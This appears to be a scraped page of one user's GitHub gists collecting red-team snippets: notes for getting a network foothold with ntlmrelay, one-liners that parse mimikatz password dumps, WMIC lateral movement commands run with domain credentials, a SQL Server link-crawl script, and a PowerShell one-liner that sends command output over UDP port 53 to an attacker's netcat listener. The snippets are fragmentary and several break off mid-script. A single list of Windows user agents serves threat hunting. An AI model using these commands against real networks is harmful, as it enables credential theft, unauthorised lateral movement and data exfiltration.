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living off the land!
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jivoi / AtomicTestsCommandLines.txt
Created September 5, 2018 10:18
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_|
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
jivoi / Native-Windows-Useragents-malicious.txt
Created July 8, 2019 09:31 — forked from GossiTheDog/Native-Windows-Useragents-malicious.txt
Native Windows UserAgents for Threat Hunting
//Invoke-WebRequest in Powershell - manually whitelist legit content first:
//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*
//certutil.exe - manually whitelist legit content first:
jivoi /
Created July 16, 2019 08:34
Pwning internal networks automagically


This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone /opt/impacket
cd /opt/impacket
pip install .
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
echo "[+] Creating DHCP server config."
cat <<EOF > /etc/dhcp/dhcp.${IF_IN}.conf
option routers ${SUB}.1;
option domain-name-servers ${SUB}.1;
default-lease-time 14440;
echo "[+] Bringing interface ${IF_IN} down"
ip addr del ${SUB}.1/24 dev ${IF_IN}
ip link set dev ${IF_IN} down
echo "[+] Removing iptable rules"
jivoi / wmicLateralMovement.txt
Created December 12, 2019 10:40 — forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell ( but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
jivoi / SQLServerLinkCrawl-2-Cypher.ps1
Last active January 28, 2020 14:34
# Get-SQLServerLinkCrawl -verbose -instance "[ip-address]\SQLSERVER2008" -username 'guest' -password 'guest' | export-clixml c:\temp\links.xml
$List = Import-CliXml 'C:\temp\links.xml'
$Servers = $List | select name,version,path,user,sysadmin -unique | where name -ne 'broken link'
$Outnodes = @()
$Outpaths = @()
foreach($Server in $Servers){
$Outnodes += "$([string][math]::abs($Server.Name.GetHashCode())),$($Server.Name),$($Server.Version)"
jivoi /
Created February 18, 2020 11:25
### Proxy curl/wget ###
export http_proxy=localhost:8080
export https_proxy=localhost:8080
curl -k
wget --no-check-certificates
### Proxy Java JARs ###
jivoi / powershell-udp-rce-output.txt
Created July 14, 2020 19:32 — forked from ignis-sec/powershell-udp-rce-output.txt
powershell command to return executed command output from 53/udp.
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"